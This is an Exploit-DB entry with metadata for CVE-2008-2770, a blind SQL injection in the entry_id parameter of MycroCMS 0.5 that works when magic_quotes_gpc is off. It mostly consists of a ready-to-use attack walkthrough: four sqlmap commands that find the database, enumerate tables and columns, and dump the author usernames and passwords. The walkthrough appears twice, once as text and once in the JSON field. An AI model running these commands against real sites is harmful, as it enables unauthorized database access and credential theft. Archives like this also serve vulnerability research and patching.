ID EDB-ID:5787
Type exploitdb
Reporter CWH Underground
Modified 2008-06-11T00:00:00
Description
MycroCMS 0.5 Remote Blind SQL Injection Vulnerability. CVE-2008-2770. Webapps exploit for php platform
=======================================================
MycroCMS 0.5 Remote Blind SQL Injection Vulnerability
=======================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 11 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : MycroCMS
VERSION : 0.5 (Lastest Version)
DOWNLOAD : http://downloads.sourceforge.net/mycrocms
#####################################################
---Remote Blind SQL Injection---
***magic_quotes_gpc = off***
-----------------
Vulnerable Path
-----------------
[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]
---------------------------------
Blind SQL Injection with SqlMap
---------------------------------
[+] Find DB name
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3
[+] Enumerate All Tables (Use Database "mycrocms")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3
[+] Enumerate All Columns in Table (Use Table "mbauthor")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3
[+] Dump All Data in Column (Use Column "author_name" and "author_pw")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-11]
{"id": "EDB-ID:5787", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability", "description": "MycroCMS 0.5 Remote Blind SQL Injection Vulnerability. CVE-2008-2770. Webapps exploit for php platform", "published": "2008-06-11T00:00:00", "modified": "2008-06-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5787/", "reporter": "CWH Underground", "references": [], "cvelist": ["CVE-2008-2770"], "lastseen": "2016-01-31T23:34:06", "viewCount": 6, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T23:34:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2770"]}], "modified": "2016-01-31T23:34:06", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/5787/", "sourceData": "=======================================================\n MycroCMS 0.5 Remote Blind SQL Injection Vulnerability \n=======================================================\n\n ,--^----------,--------,-----,-------^--,\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\n `+---------------------------^----------|\n `\\_,-------, _________________________|\n / XXXXXX /`| /\n / XXXXXX / `\\ /\n / XXXXXX /\\______(\n / XXXXXX / \n / XXXXXX /\n (________( \n `------'\n\nAUTHOR : CWH Underground\nDATE : 11 June 2008\nSITE : www.citec.us\n\n\n#####################################################\n APPLICATION : MycroCMS\n VERSION : 0.5 (Lastest Version)\n DOWNLOAD : http://downloads.sourceforge.net/mycrocms\n#####################################################\n\n---Remote Blind SQL Injection---\n\n***magic_quotes_gpc = off***\n\n-----------------\n Vulnerable Path\n-----------------\n\n[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]\n\n\n---------------------------------\n Blind SQL Injection with SqlMap\n---------------------------------\n\n[+] Find DB name\nPOC Exploit: ./sqlmap.py -p \"entry_id\" -a \"./txt/user-agents.txt\" --current-db -u http://localhost/mycrocms/?entry_id=3\n\n[+] Enumerate All Tables (Use Database \"mycrocms\")\nPOC Exploit: ./sqlmap.py -p \"entry_id\" -a \"./txt/user-agents.txt\" -D \"mycrocms\" --tables -u http://localhost/mycrocms/?entry_id=3\n\n[+] Enumerate All Columns in Table (Use Table \"mbauthor\")\nPOC Exploit: ./sqlmap.py -p \"entry_id\" -a \"./txt/user-agents.txt\" -D \"mycrocms\" -T \"mbauthor\" --columns -u http://localhost/mycrocms/?entry_id=3\n\n[+] Dump All Data in Column (Use Column \"author_name\" and \"author_pw\")\nPOC Exploit: ./sqlmap.py -p \"entry_id\" -a \"./txt/user-agents.txt\" -D \"mycrocms\" -T \"mbauthor\" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3\n\n\n##################################################################\n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #\n##################################################################\n\n# milw0rm.com [2008-06-11]\n", "osvdbidlist": ["46453"]}
{"cve": [{"lastseen": "2020-10-03T11:50:59", "description": "SQL injection vulnerability in index.php in MycroCMS 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the entry_id parameter.", "edition": 3, "cvss3": {}, "published": "2008-06-18T22:41:00", "title": "CVE-2008-2770", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2770"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:mycrocms:mycrocms:0.5"], "id": "CVE-2008-2770", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2770", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mycrocms:mycrocms:0.5:*:*:*:*:*:*:*"]}]}
